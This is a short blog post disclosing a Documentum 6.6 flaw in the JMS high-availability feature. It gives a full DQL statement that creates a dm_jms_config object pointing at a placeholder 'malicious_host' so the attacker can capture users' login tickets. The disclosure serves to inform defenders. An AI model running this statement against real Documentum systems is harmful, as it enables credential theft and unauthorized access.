documentum security vulnerabilities: JMS HA feature

In Documentum 6.6 release EMC introduced high-availability feature for JMS:

and now any user is able to create dm_jms_config object pointing to malicious http server and catch login tickets:

create dm_jms_config object 
set object_name='malicious JMS config',
set config_type=2,
append server_config_id=(select r_object_id from dm_server_config)
append servlet_name='do_bpm',
append base_uri='http://malicious_host:port/....',
append supported_protocol='http',
append projection_enable=TRUE,
append projection_proximity_value=1,
append projection_targets='malicious_host',
append projection_ports=0

2 thoughts on “documentum security vulnerabilities: JMS HA feature

  1. Pingback: God bless EMC. Part VII | Documentum in a (nuts)HELL
  2. Pingback: Is it possible to compromise Documentum by deleting object? Typical mistakes | Documentum in a (nuts)HELL

Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s